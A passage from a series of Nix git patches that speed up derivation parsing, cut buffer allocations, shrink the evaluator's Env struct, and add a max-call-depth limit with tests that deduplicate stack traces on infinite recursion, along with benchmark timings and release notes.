end-of-string checks and an advancing position in an immutable memory buffer, both of which can be had for much cheaper than istreams allow. the effect of this change is most apparent on empty stores. 
before: Benchmark 1: nix eval --raw --impure --expr 'with import <nixpkgs> {}; system' Time (mean ± σ): 7.167 s ± 0.013 s [User: 5.528 s, System: 1.431 s] Range (min … max): 7.147 s … 7.182 s 10 runs after: Benchmark 1: nix eval --raw --impure --expr 'with import <nixpkgs> {}; system'
*/ -static std::string parseString(std::istream & str) +static std::string parseString(StringViewStream & str) { std::string res; expect(str, "\""); @@ -187,7 +208,7 @@ static void validatePath(std::string_view s) { throw FormatError("bad path '%1%' in derivation", s); } -static Path parsePath(std::istream & str) +static Path parsePath(StringViewStream & str) { auto s = parseString(str); validatePath(s); @@ -195,7 +216,7 @@ static Path parsePath(std::istream & str) } -static bool endOfList(std::istream & str) +static bool endOfList(StringViewStream & str) { if (str.peek() == ',') { str.get(); @@ -209,7 +230,7 @@ static bool endOfList(std::istream & str) } -static StringSet parseStrings(std::istream & str, bool arePaths) +static StringSet parseStrings(StringViewStream & str, bool arePaths) { StringSet res; expect(str, "["); @@ -267,7 +288,7 @@ static DerivationOutput parseDerivationOutput( } static DerivationOutput parseDerivationOutput( - const StoreDirConfig & store, std::istringstream & str, + const StoreDirConfig & store, StringViewStream & str, const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings) { expect(str, ","); const auto pathS = parseString(str); @@ -297,7 +318,7 @@ enum struct DerivationATermVersion { static DerivedPathMap::ChildNode parseDerivedPathMapNode( const StoreDirConfig & store, - std::istringstream & str, + StringViewStream & str, DerivationATermVersion version) { DerivedPathMap::ChildNode node; @@ -349,7 +370,7 @@ Derivation parseDerivation( Derivation drv; drv.name = name; - std::istringstream str(std::move(s)); + StringViewStream str{s}; expect(str, "D"); DerivationATermVersion version; switch (str.peek()) { From 2cfc4ace35d1c8cca917c487be3cfddfcf3bba01 Mon Sep 17 00:00:00 2001 From: pennae Date: Tue, 26 Dec 2023 17:40:55 +0100 Subject: [PATCH 180/654] malloc/memset even less MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit more buffers that can be uninitialized and on the 
stack. small difference, but still worth doing. before: Benchmark 1: nix eval --raw --impure --expr 'with import <nixpkgs> {}; system' Time (mean ± σ): 6.963 s ± 0.011 s [User: 5.330 s, System: 1.421 s] Range (min … max): 6.943 s … 6.974 s 10 runs after: Benchmark 1: nix eval --raw --impure --expr 'with import <nixpkgs> {}; system' Time (mean ± σ): 6.952 s ± 0.015 s [User: 5.294 s, System: 1.452 s] Range (min … max): 6.926 s … 6.974 s 10 runs --- src/libutil/archive.cc | 2 +- src/libutil/file-system.cc | 2 +- src/libutil/serialise.cc | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/src/libutil/archive.cc b/src/libutil/archive.cc index 465df2073..712ea51c7 100644 --- a/src/libutil/archive.cc +++ b/src/libutil/archive.cc @@ -140,7 +140,7 @@ static void parseContents(ParseSink & sink, Source & source, const Path & path) sink.preallocateContents(size); uint64_t left = size; - std::vector<char> buf(65536); + std::array<char, 65536> buf; while (left) { checkInterrupt(); diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc index c96effff9..4cac35ace 100644 --- a/src/libutil/file-system.cc +++ b/src/libutil/file-system.cc @@ -307,7 +307,7 @@ void writeFile(const Path & path, Source & source, mode_t mode, bool sync) if (!fd) throw SysError("opening file '%1%'", path); - std::vector<char> buf(64 * 1024); + std::array<char, 64 * 1024> buf; try { while (true) { diff --git a/src/libutil/serialise.cc b/src/libutil/serialise.cc index f465bd0de..76b378e18 100644 --- a/src/libutil/serialise.cc +++ b/src/libutil/serialise.cc @@ -82,7 +82,7 @@ void Source::operator () (std::string_view data) void Source::drainInto(Sink & sink) { std::string s; - std::vector<char> buf(8192); + std::array<char, 8192> buf; while (true) { size_t n; try {
fixes a segfault on infinite function call recursion (rather than infinite thunk recursion) by tracking the function call depth in `EvalState`. Additionally, to avoid printing extremely long stack traces, stack frames are now deduplicated, with a `(19997 duplicate traces omitted)` message. This should only really be triggered in infinite recursion scenarios. Before: $ nix-instantiate --eval --expr '(x: x x) (x: x x)' Segmentation fault: 11 After: $ nix-instantiate --eval --expr '(x: x x) (x: x x)' error: stack overflow at «string»:1:14: 1| (x: x x) (x: x x) | ^ $ nix-instantiate --eval --expr '(x: x x) (x: x x)' --show-trace error: … from call site at «string»:1:1: 1| (x: x x) (x: x x) | ^ … while calling anonymous lambda at «string»:1:2: 1| (x: x x) (x: x x) | ^ … from call site at «string»:1:5: 1| (x: x x) (x: x x) | ^ … while calling anonymous lambda at «string»:1:11: 1| (x: x x) (x: x x) | ^ … from call site at «string»:1:14: 1| (x: x x) (x: x x) | ^ (19997 duplicate traces omitted) error: stack overflow at «string»:1:14: 1| (x: x x) (x: x x) | ^ --- .../rl-next/stack-overflow-segfaults.md | 32 +++++ src/libexpr/eval-settings.hh | 3 + src/libexpr/eval.cc | 18 +++ src/libexpr/eval.hh | 5 + src/libutil/error.cc | 111 +++++++++++++++++- src/libutil/error.hh | 8 ++ .../lang/eval-fail-duplicate-traces.err.exp | 44 +++++++ .../lang/eval-fail-duplicate-traces.nix | 9 ++ ...val-fail-infinite-recursion-lambda.err.exp | 38 ++++++ .../eval-fail-infinite-recursion-lambda.nix | 1 + .../lang/eval-fail-mutual-recursion.err.exp | 57 +++++++++ .../lang/eval-fail-mutual-recursion.nix | 36 ++++++ 12 files changed, 358 insertions(+), 4 deletions(-) create mode 100644 doc/manual/rl-next/stack-overflow-segfaults.md create mode 100644 tests/functional/lang/eval-fail-duplicate-traces.err.exp create mode 100644 tests/functional/lang/eval-fail-duplicate-traces.nix create mode 100644 tests/functional/lang/eval-fail-infinite-recursion-lambda.err.exp create mode 100644 
tests/functional/lang/eval-fail-infinite-recursion-lambda.nix create mode 100644 tests/functional/lang/eval-fail-mutual-recursion.err.exp create mode 100644 tests/functional/lang/eval-fail-mutual-recursion.nix diff --git a/doc/manual/rl-next/stack-overflow-segfaults.md b/doc/manual/rl-next/stack-overflow-segfaults.md new file mode 100644 index 000000000..3d9753248 --- /dev/null +++ b/doc/manual/rl-next/stack-overflow-segfaults.md @@ -0,0 +1,32 @@ +--- +synopsis: Some stack overflow segfaults are fixed +issues: 9616 +prs: 9617 +--- + +The number of nested function calls has been restricted, to detect and report +infinite function call recursions. The default maximum call depth is 10,000 and +can be set with [the `max-call-depth` +option](@docroot@/command-ref/conf-file.md#conf-max-call-depth). + +This fixes segfaults or the following unhelpful error message in many cases: + + error: stack overflow (possible infinite recursion) + +Before: + +``` +$ nix-instantiate --eval --expr '(x: x x) (x: x x)' +Segmentation fault: 11 +``` + +After: + +``` +$ nix-instantiate --eval --expr '(x: x x) (x: x x)' +error: stack overflow + + at «string»:1:14: + 1| (x: x x) (x: x x) + | ^ +``` diff --git a/src/libexpr/eval-settings.hh b/src/libexpr/eval-settings.hh index ad187ca01..2f6c12d45 100644 --- a/src/libexpr/eval-settings.hh +++ b/src/libexpr/eval-settings.hh @@ -124,6 +124,9 @@ struct EvalSettings : Config Setting traceVerbose{this, false, "trace-verbose", "Whether `builtins.traceVerbose` should trace its first argument when evaluated."}; + + Setting maxCallDepth{this, 10000, "max-call-depth", + "The maximum function call depth to allow before erroring."}; }; extern EvalSettings evalSettings; diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 810843995..f73e22ba0 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -1505,9 +1505,27 @@ void ExprLambda::eval(EvalState & state, Env & env, Value & v) v.mkLambda(&env, this); } +namespace { +/** Increments a count on 
construction and decrements on destruction. + */ +class CallDepth { + size_t & count; +public: + CallDepth(size_t & count) : count(count) { + ++count; + } + ~CallDepth() { + --count; + } +}; +}; void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & vRes, const PosIdx pos) { + if (callDepth > evalSettings.maxCallDepth) + error("stack overflow; max-call-depth exceeded").atPos(pos).template debugThrow(); + CallDepth _level(callDepth); + auto trace = evalSettings.traceFunctionCalls ? std::make_unique(positions[pos]) : nullptr; diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index da2d256db..7dbffe38c 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -622,6 +622,11 @@ private: const SourcePath & basePath, std::shared_ptr & staticEnv); + /** + * Current Nix call stack depth, used with `max-call-depth` setting to throw stack overflow hopefully before we run out of system stack. + */ + size_t callDepth = 0; + public: /** diff --git a/src/libutil/error.cc b/src/libutil/error.cc index bc0194d59..e42925c2b 100644 --- a/src/libutil/error.cc +++ b/src/libutil/error.cc @@ -50,6 +50,32 @@ std::ostream & operator <<(std::ostream & str, const AbstractPos & pos) return str; } +/** + * An arbitrarily defined value comparison for the purpose of using traces in the key of a sorted container. + */ +inline bool operator<(const Trace& lhs, const Trace& rhs) +{ + // `std::shared_ptr` does not have value semantics for its comparison + // functions, so we need to check for nulls and compare the dereferenced + // values here. + if (lhs.pos != rhs.pos) { + if (!lhs.pos) + return true; + if (!rhs.pos) + return false; + if (*lhs.pos != *rhs.pos) + return *lhs.pos < *rhs.pos; + } + // This formats a freshly formatted hint string and then throws it away, which + // shouldn't be much of a problem because it only runs when pos is equal, and this function is + // used for trace printing, which is infrequent. 
+ return std::forward_as_tuple(lhs.hint.str(), lhs.frame) + < std::forward_as_tuple(rhs.hint.str(), rhs.frame); +} +inline bool operator> (const Trace& lhs, const Trace& rhs) { return rhs < lhs; } +inline bool operator<=(const Trace& lhs, const Trace& rhs) { return !(lhs > rhs); } +inline bool operator>=(const Trace& lhs, const Trace& rhs) { return !(lhs < rhs); } + std::optional AbstractPos::getCodeLines() const { if (line == 0) @@ -185,6 +211,69 @@ static bool printPosMaybe(std::ostream & oss, std::string_view indent, const std return hasPos; } +void printTrace( + std::ostream & output, + const std::string_view & indent, + size_t & count, + const Trace & trace) +{ + output << "\n" << "… " << trace.hint.str() << "\n"; + + if (printPosMaybe(output, indent, trace.pos)) + count++; +} + +void printSkippedTracesMaybe( + std::ostream & output, + const std::string_view & indent, + size_t & count, + std::vector & skippedTraces, + std::set tracesSeen) +{ + if (skippedTraces.size() > 0) { + // If we only skipped a few frames, print them out normally; + // messages like "1 duplicate frames omitted" aren't helpful. + if (skippedTraces.size() <= 5) { + for (auto & trace : skippedTraces) { + printTrace(output, indent, count, trace); + } + } else { + output << "\n" << ANSI_WARNING "(" << skippedTraces.size() << " duplicate frames omitted)" ANSI_NORMAL << "\n"; + // Clear the set of "seen" traces after printing a chunk of + // `duplicate frames omitted`. + // + // Consider a mutually recursive stack trace with: + // - 10 entries of A + // - 10 entries of B + // - 10 entries of A + // + // If we don't clear `tracesSeen` here, we would print output like this: + // - 1 entry of A + // - (9 duplicate frames omitted) + // - 1 entry of B + // - (19 duplicate frames omitted) + // + // This would obscure the control flow, which went from A, + // to B, and back to A again. 
+ // + // In contrast, if we do clear `tracesSeen`, the output looks like this: + // - 1 entry of A + // - (9 duplicate frames omitted) + // - 1 entry of B + // - (9 duplicate frames omitted) + // - 1 entry of A + // - (9 duplicate frames omitted) + // + // See: `tests/functional/lang/eval-fail-mutual-recursion.nix` + tracesSeen.clear(); + } + } + // We've either printed each trace in `skippedTraces` normally, or + // printed a chunk of `duplicate frames omitted`. Either way, we've + // processed these traces and can clear them. + skippedTraces.clear(); +} + std::ostream & showErrorInfo(std::ostream & out, const ErrorInfo & einfo, bool showTrace) { std::string prefix; @@ -333,7 +422,13 @@ std::ostream & showErrorInfo(std::ostream & out, const ErrorInfo & einfo, bool s bool frameOnly = false; if (!einfo.traces.empty()) { + // Stack traces seen since we last printed a chunk of `duplicate frames + // omitted`. + std::set tracesSeen; + // A consecutive sequence of stack traces that are all in `tracesSeen`. 
+ std::vector<Trace> skippedTraces;
@@ +error: + … from call site + at /pwd/lang/eval-fail-duplicate-traces.nix:9:3: + 8| in + 9| throwAfter 2 + | ^ + 10| + + … while calling 'throwAfter' + at /pwd/lang/eval-fail-duplicate-traces.nix:4:16: + 3| let + 4| throwAfter = n: + | ^ + 5| if n > 0 + + … from call site + at /pwd/lang/eval-fail-duplicate-traces.nix:6:10: + 5| if n > 0 + 6| then throwAfter (n - 1) + | ^ + 7| else throw "Uh oh!"; + + … while calling 'throwAfter' + at /pwd/lang/eval-fail-duplicate-traces.nix:4:16: + 3| let + 4| throwAfter = n: + | ^ + 5| if n > 0 + + … from call site + at /pwd/lang/eval-fail-duplicate-traces.nix:6:10: + 5| if n > 0 + 6| then throwAfter (n - 1) + | ^ + 7| else throw "Uh oh!"; + + … while calling 'throwAfter' + at /pwd/lang/eval-fail-duplicate-traces.nix:4:16: + 3| let + 4| throwAfter = n: + | ^ + 5| if n > 0 + + error: Uh oh! diff --git a/tests/functional/lang/eval-fail-duplicate-traces.nix b/tests/functional/lang/eval-fail-duplicate-traces.nix new file mode 100644 index 000000000..17ce374ec --- /dev/null +++ b/tests/functional/lang/eval-fail-duplicate-traces.nix @@ -0,0 +1,9 @@ +# Check that we only omit duplicate stack traces when there's a bunch of them. +# Here, there's only a couple duplicate entries, so we output them all. 
+let + throwAfter = n: + if n > 0 + then throwAfter (n - 1) + else throw "Uh oh!"; +in + throwAfter 2 diff --git a/tests/functional/lang/eval-fail-infinite-recursion-lambda.err.exp b/tests/functional/lang/eval-fail-infinite-recursion-lambda.err.exp new file mode 100644 index 000000000..5d843d827 --- /dev/null +++ b/tests/functional/lang/eval-fail-infinite-recursion-lambda.err.exp @@ -0,0 +1,38 @@ +error: + … from call site + at /pwd/lang/eval-fail-infinite-recursion-lambda.nix:1:1: + 1| (x: x x) (x: x x) + | ^ + 2| + + … while calling anonymous lambda + at /pwd/lang/eval-fail-infinite-recursion-lambda.nix:1:2: + 1| (x: x x) (x: x x) + | ^ + 2| + + … from call site + at /pwd/lang/eval-fail-infinite-recursion-lambda.nix:1:5: + 1| (x: x x) (x: x x) + | ^ + 2| + + … while calling anonymous lambda + at /pwd/lang/eval-fail-infinite-recursion-lambda.nix:1:11: + 1| (x: x x) (x: x x) + | ^ + 2| + + … from call site + at /pwd/lang/eval-fail-infinite-recursion-lambda.nix:1:14: + 1| (x: x x) (x: x x) + | ^ + 2| + + (19997 duplicate frames omitted) + + error: stack overflow; max-call-depth exceeded + at /pwd/lang/eval-fail-infinite-recursion-lambda.nix:1:14: + 1| (x: x x) (x: x x) + | ^ + 2| diff --git a/tests/functional/lang/eval-fail-infinite-recursion-lambda.nix b/tests/functional/lang/eval-fail-infinite-recursion-lambda.nix new file mode 100644 index 000000000..dd0a8bf2e --- /dev/null +++ b/tests/functional/lang/eval-fail-infinite-recursion-lambda.nix @@ -0,0 +1 @@ +(x: x x) (x: x x) diff --git a/tests/functional/lang/eval-fail-mutual-recursion.err.exp b/tests/functional/lang/eval-fail-mutual-recursion.err.exp new file mode 100644 index 000000000..dc2e11766 --- /dev/null +++ b/tests/functional/lang/eval-fail-mutual-recursion.err.exp @@ -0,0 +1,57 @@ +error: + … from call site + at /pwd/lang/eval-fail-mutual-recursion.nix:36:3: + 35| in + 36| throwAfterA true 10 + | ^ + 37| + + … while calling 'throwAfterA' + at /pwd/lang/eval-fail-mutual-recursion.nix:29:26: + 28| + 29| 
throwAfterA = recurse: n: + | ^ + 30| if n > 0 + + … from call site + at /pwd/lang/eval-fail-mutual-recursion.nix:31:10: + 30| if n > 0 + 31| then throwAfterA recurse (n - 1) + | ^ + 32| else if recurse + + (19 duplicate frames omitted) + + … from call site + at /pwd/lang/eval-fail-mutual-recursion.nix:33:10: + 32| else if recurse + 33| then throwAfterB true 10 + | ^ + 34| else throw "Uh oh!"; + + … while calling 'throwAfterB' + at /pwd/lang/eval-fail-mutual-recursion.nix:22:26: + 21| let + 22| throwAfterB = recurse: n: + | ^ + 23| if n > 0 + + … from call site + at /pwd/lang/eval-fail-mutual-recursion.nix:24:10: + 23| if n > 0 + 24| then throwAfterB recurse (n - 1) + | ^ + 25| else if recurse + + (19 duplicate frames omitted) + + … from call site + at /pwd/lang/eval-fail-mutual-recursion.nix:26:10: + 25| else if recurse + 26| then throwAfterA false 10 + | ^ + 27| else throw "Uh oh!"; + + (21 duplicate frames omitted) + + error: Uh oh! diff --git a/tests/functional/lang/eval-fail-mutual-recursion.nix b/tests/functional/lang/eval-fail-mutual-recursion.nix new file mode 100644 index 000000000..d090d3158 --- /dev/null +++ b/tests/functional/lang/eval-fail-mutual-recursion.nix @@ -0,0 +1,36 @@ +# Check that stack frame deduplication only affects consecutive intervals, and +# that they are reported independently of any preceding sections, even if +# they're indistinguishable. +# +# In terms of the current implementation, we check that we clear the set of +# "seen frames" after eliding a group of frames. 
+# +# Suppose we have: +# - 10 frames in a function A +# - 10 frames in a function B +# - 10 frames in a function A +# +# We want to output: +# - a few frames of A (skip the rest) +# - a few frames of B (skip the rest) +# - a few frames of A (skip the rest) +# +# If we implemented this in the naive manner, we'd instead get: +# - a few frames of A (skip the rest) +# - a few frames of B (skip the rest, _and_ skip the remaining frames of A) +let + throwAfterB = recurse: n: + if n > 0 + then throwAfterB recurse (n - 1) + else if recurse + then throwAfterA false 10 + else throw "Uh oh!"; + + throwAfterA = recurse: n: + if n > 0 + then throwAfterA recurse (n - 1) + else if recurse + then throwAfterB true 10 + else throw "Uh oh!"; +in + throwAfterA true 10 From 79d3d412cacd210bc9a0e9ba5407eea67c8e3868 Mon Sep 17 00:00:00 2001 From: pennae Date: Tue, 26 Dec 2023 22:18:42 +0100 Subject: [PATCH 182/654] optimize derivation string parsing MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit a bunch of derivation strings contain no escape sequences. we can optimize for this fact by first scanning for the end of a derivation string and simply returning the contents unmodified if no escape sequences were found. to make this even more efficient we can also use BackedStringViews to avoid copies, avoiding heap allocations for transient data. 
before: Benchmark 1: nix eval --raw --impure --expr 'with import {}; system' Time (mean ± σ): 6.952 s ± 0.015 s [User: 5.294 s, System: 1.452 s] Range (min … max): 6.926 s … 6.974 s 10 runs after: Benchmark 1: nix eval --raw --impure --expr 'with import {}; system' Time (mean ± σ): 6.907 s ± 0.012 s [User: 5.272 s, System: 1.429 s] Range (min … max): 6.893 s … 6.926 s 10 runs --- doc/manual/rl-next/drv-string-parse-hang.md | 6 ++ src/libstore/derivations.cc | 65 +++++++++++++-------- 2 files changed, 48 insertions(+), 23 deletions(-) create mode 100644 doc/manual/rl-next/drv-string-parse-hang.md diff --git a/doc/manual/rl-next/drv-string-parse-hang.md b/doc/manual/rl-next/drv-string-parse-hang.md new file mode 100644 index 000000000..1e041d3e9 --- /dev/null +++ b/doc/manual/rl-next/drv-string-parse-hang.md @@ -0,0 +1,6 @@ +--- +synopsis: Fix handling of truncated `.drv` files. +prs: 9673 +--- + +Previously a `.drv` that was truncated in the middle of a string would case nix to enter an infinite loop, eventually exhausting all memory and crashing. diff --git a/src/libstore/derivations.cc b/src/libstore/derivations.cc index 973ce5211..89d902917 100644 --- a/src/libstore/derivations.cc +++ b/src/libstore/derivations.cc @@ -2,6 +2,7 @@ #include "downstream-placeholder.hh" #include "store-api.hh" #include "globals.hh" +#include "types.hh" #include "util.hh" #include "split.hh" #include "common-protocol.hh" @@ -186,20 +187,38 @@ static void expect(StringViewStream & str, std::string_view s) /* Read a C-style string from stream `str'. 
*/ -static std::string parseString(StringViewStream & str) +static BackedStringView parseString(StringViewStream & str) { - std::string res; expect(str, "\""); - int c; - while ((c = str.get()) != '"') - if (c == '\\') { - c = str.get(); - if (c == 'n') res += '\n'; - else if (c == 'r') res += '\r'; - else if (c == 't') res += '\t'; - else res += c; + auto c = str.remaining.begin(), end = str.remaining.end(); + bool escaped = false; + for (; c != end && *c != '"'; c++) { + if (*c == '\\') { + c++; + if (c == end) + throw FormatError("unterminated string in derivation"); + escaped = true; } - else res += c; + } + + const auto contentLen = c - str.remaining.begin(); + const auto content = str.remaining.substr(0, contentLen); + str.remaining.remove_prefix(contentLen + 1); + + if (!escaped) + return content; + + std::string res; + res.reserve(content.size()); + for (c = content.begin(), end = content.end(); c != end; c++) + if (*c == '\\') { + c++; + if (*c == 'n') res += '\n'; + else if (*c == 'r') res += '\r'; + else if (*c == 't') res += '\t'; + else res += *c; + } + else res += *c; return res; } @@ -210,7 +229,7 @@ static void validatePath(std::string_view s) { static Path parsePath(StringViewStream & str) { - auto s = parseString(str); + auto s = parseString(str).toOwned(); validatePath(s); return s; } @@ -235,7 +254,7 @@ static StringSet parseStrings(StringViewStream & str, bool arePaths) StringSet res; expect(str, "["); while (!endOfList(str)) - res.insert(arePaths ? parsePath(str) : parseString(str)); + res.insert(arePaths ? 
parsePath(str) : parseString(str).toOwned()); return res; } @@ -296,7 +315,7 @@ static DerivationOutput parseDerivationOutput( expect(str, ","); const auto hash = parseString(str); expect(str, ")"); - return parseDerivationOutput(store, pathS, hashAlgo, hash, xpSettings); + return parseDerivationOutput(store, *pathS, *hashAlgo, *hash, xpSettings); } /** @@ -344,7 +363,7 @@ static DerivedPathMap::ChildNode parseDerivedPathMapNode( expect(str, ",["); while (!endOfList(str)) { expect(str, "("); - auto outputName = parseString(str); + auto outputName = parseString(str).toOwned(); expect(str, ","); node.childMap.insert_or_assign(outputName, parseDerivedPathMapNode(store, str, version)); expect(str, ")"); @@ -381,12 +400,12 @@ Derivation parseDerivation( case 'r': { expect(str, "rvWithVersion("); auto versionS = parseString(str); - if (versionS == "xp-dyn-drv") { + if (*versionS == "xp-dyn-drv") { // Only verison we have so far version = DerivationATermVersion::DynamicDerivations; xpSettings.require(Xp::DynamicDerivations); } else { - throw FormatError("Unknown derivation ATerm format version '%s'", versionS); + throw FormatError("Unknown derivation ATerm format version '%s'", *versionS); } expect(str, ","); break; @@ -398,7 +417,7 @@ Derivation parseDerivation( /* Parse the list of outputs. */ expect(str, "["); while (!endOfList(str)) { - expect(str, "("); std::string id = parseString(str); + expect(str, "("); std::string id = parseString(str).toOwned(); auto output = parseDerivationOutput(store, str, xpSettings); drv.outputs.emplace(std::move(id), std::move(output)); } @@ -414,19 +433,19 @@ Derivation parseDerivation( } expect(str, ","); drv.inputSrcs = store.parseStorePathSet(parseStrings(str, true)); - expect(str, ","); drv.platform = parseString(str); - expect(str, ","); drv.builder = parseString(str); + expect(str, ","); drv.platform = parseString(str).toOwned(); + expect(str, ","); drv.builder = parseString(str).toOwned(); /* Parse the builder arguments. 
*/ expect(str, ",["); while (!endOfList(str)) - drv.args.push_back(parseString(str)); + drv.args.push_back(parseString(str).toOwned()); /* Parse the environment variables. */ expect(str, ",["); while (!endOfList(str)) { - expect(str, "("); auto name = parseString(str); - expect(str, ","); auto value = parseString(str); + expect(str, "("); auto name = parseString(str).toOwned(); + expect(str, ","); auto value = parseString(str).toOwned(); expect(str, ")"); drv.env[name] = value; } From 02c64abf1e892220cb62ce3b7e1598030fb6a61c Mon Sep 17 00:00:00 2001 From: pennae Date: Tue, 26 Dec 2023 05:44:52 +0100 Subject: [PATCH 183/654] use translation table for drv string parsing MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit the table is very small compared to cache sizes and a single indexed load is faster than three comparisons. before: Benchmark 1: nix eval --raw --impure --expr 'with import {}; system' Time (mean ± σ): 6.907 s ± 0.012 s [User: 5.272 s, System: 1.429 s] Range (min … max): 6.893 s … 6.926 s 10 runs after: Benchmark 1: nix eval --raw --impure --expr 'with import {}; system' Time (mean ± σ): 6.883 s ± 0.016 s [User: 5.250 s, System: 1.424 s] Range (min … max): 6.860 s … 6.905 s 10 runs --- src/libstore/derivations.cc | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/src/libstore/derivations.cc b/src/libstore/derivations.cc index 89d902917..89a345057 100644 --- a/src/libstore/derivations.cc +++ b/src/libstore/derivations.cc @@ -174,6 +174,17 @@ struct StringViewStream { return c; } }; + +constexpr struct Escapes { + char map[256]; + constexpr Escapes() { + for (int i = 0; i < 256; i++) map[i] = (char) (unsigned char) i; + map[(int) (unsigned char) 'n'] = '\n'; + map[(int) (unsigned char) 'r'] = '\r'; + map[(int) (unsigned char) 't'] = '\t'; + } + char operator[](char c) const { return map[(unsigned char) c]; } +} escapes; } @@ -213,10 +224,7 @@ static BackedStringView 
parseString(StringViewStream & str) for (c = content.begin(), end = content.end(); c != end; c++) if (*c == '\\') { c++; - if (*c == 'n') res += '\n'; - else if (*c == 'r') res += '\r'; - else if (*c == 't') res += '\t'; - else res += *c; + res += escapes[*c]; } else res += *c; return res; From c62686a95bd3ebbf3f5104c27222e751e84b84a3 Mon Sep 17 00:00:00 2001 From: pennae Date: Wed, 27 Dec 2023 04:26:50 +0100 Subject: [PATCH 184/654] reduce copies during drv parsing MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit many paths need not be heap-allocated, and derivation env name/valye pairs can be moved into the map. before: Benchmark 1: nix eval --raw --impure --expr 'with import {}; system' Time (mean ± σ): 6.883 s ± 0.016 s [User: 5.250 s, System: 1.424 s] Range (min … max): 6.860 s … 6.905 s 10 runs after: Benchmark 1: nix eval --raw --impure --expr 'with import {}; system' Time (mean ± σ): 6.868 s ± 0.027 s [User: 5.194 s, System: 1.466 s] Range (min … max): 6.828 s … 6.913 s 10 runs --- src/libstore/derivations.cc | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/src/libstore/derivations.cc b/src/libstore/derivations.cc index 89a345057..2fafcb8e7 100644 --- a/src/libstore/derivations.cc +++ b/src/libstore/derivations.cc @@ -235,10 +235,10 @@ static void validatePath(std::string_view s) { throw FormatError("bad path '%1%' in derivation", s); } -static Path parsePath(StringViewStream & str) +static BackedStringView parsePath(StringViewStream & str) { - auto s = parseString(str).toOwned(); - validatePath(s); + auto s = parseString(str); + validatePath(*s); return s; } @@ -262,7 +262,7 @@ static StringSet parseStrings(StringViewStream & str, bool arePaths) StringSet res; expect(str, "["); while (!endOfList(str)) - res.insert(arePaths ? parsePath(str) : parseString(str).toOwned()); + res.insert((arePaths ? 
parsePath(str) : parseString(str)).toOwned()); return res; } @@ -434,9 +434,9 @@ Derivation parseDerivation( expect(str, ",["); while (!endOfList(str)) { expect(str, "("); - Path drvPath = parsePath(str); + auto drvPath = parsePath(str); expect(str, ","); - drv.inputDrvs.map.insert_or_assign(store.parseStorePath(drvPath), parseDerivedPathMapNode(store, str, version)); + drv.inputDrvs.map.insert_or_assign(store.parseStorePath(*drvPath), parseDerivedPathMapNode(store, str, version)); expect(str, ")"); } @@ -455,7 +455,7 @@ Derivation parseDerivation( expect(str, "("); auto name = parseString(str).toOwned(); expect(str, ","); auto value = parseString(str).toOwned(); expect(str, ")"); - drv.env[name] = value; + drv.env.insert_or_assign(std::move(name), std::move(value)); } expect(str, ")"); From 1fe66852ff87e98615f35e8aac64675ff988fb5a Mon Sep 17 00:00:00 2001 From: pennae Date: Fri, 22 Dec 2023 18:19:53 +0100 Subject: [PATCH 185/654] reduce the size of Env by one pointer MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit since `up` and `values` are both pointer-aligned the type field will also be pointer-aligned, wasting 48 bits of space on most machines. we can get away with removing the type field altogether by encoding some information into the `with` expr that created the env to begin with, reducing the GC load for the absolutely massive amount of single-entry envs we create for lambdas. this reduces memory usage of system eval by quite a bit (reducing heap size of our system eval from 8.4GB to 8.23GB) and gives similar savings in eval time. 
running `nix eval --raw --impure --expr 'with import {}; system'` before: Time (mean ± σ): 5.576 s ± 0.003 s [User: 5.197 s, System: 0.378 s] Range (min … max): 5.572 s … 5.581 s 10 runs after: Time (mean ± σ): 5.408 s ± 0.002 s [User: 5.019 s, System: 0.388 s] Range (min … max): 5.405 s … 5.411 s 10 runs --- doc/manual/rl-next/env-size-reduction.md | 7 +++++ doc/manual/rl-next/with-error-reporting.md | 31 ++++++++++++++++++++++ src/libcmd/repl.cc | 2 +- src/libexpr/eval-inline.hh | 2 -- src/libexpr/eval.cc | 29 ++++++++++---------- src/libexpr/eval.hh | 5 ---- src/libexpr/nixexpr.cc | 18 ++++++++----- src/libexpr/nixexpr.hh | 13 ++++++--- src/libexpr/primops.cc | 2 +- 9 files changed, 75 insertions(+), 34 deletions(-) create mode 100644 doc/manual/rl-next/env-size-reduction.md create mode 100644 doc/manual/rl-next/with-error-reporting.md diff --git a/doc/manual/rl-next/env-size-reduction.md b/doc/manual/rl-next/env-size-reduction.md new file mode 100644 index 000000000..40a58bc28 --- /dev/null +++ b/doc/manual/rl-next/env-size-reduction.md @@ -0,0 +1,7 @@ +--- +synopsis: Reduce eval memory usage and wall time +prs: 9658 +--- + +Reduce the size of the `Env` struct used in the evaluator by a pointer, or 8 bytes on most modern machines. +This reduces memory usage during eval by around 2% and wall time by around 3%. diff --git a/doc/manual/rl-next/with-error-reporting.md b/doc/manual/rl-next/with-error-reporting.md new file mode 100644 index 000000000..10b020956 --- /dev/null +++ b/doc/manual/rl-next/with-error-reporting.md @@ -0,0 +1,31 @@ +--- +synopsis: Better error reporting for `with` expressions +prs: 9658 +--- + +`with` expressions using non-attrset values to resolve variables are now reported with proper positions. 
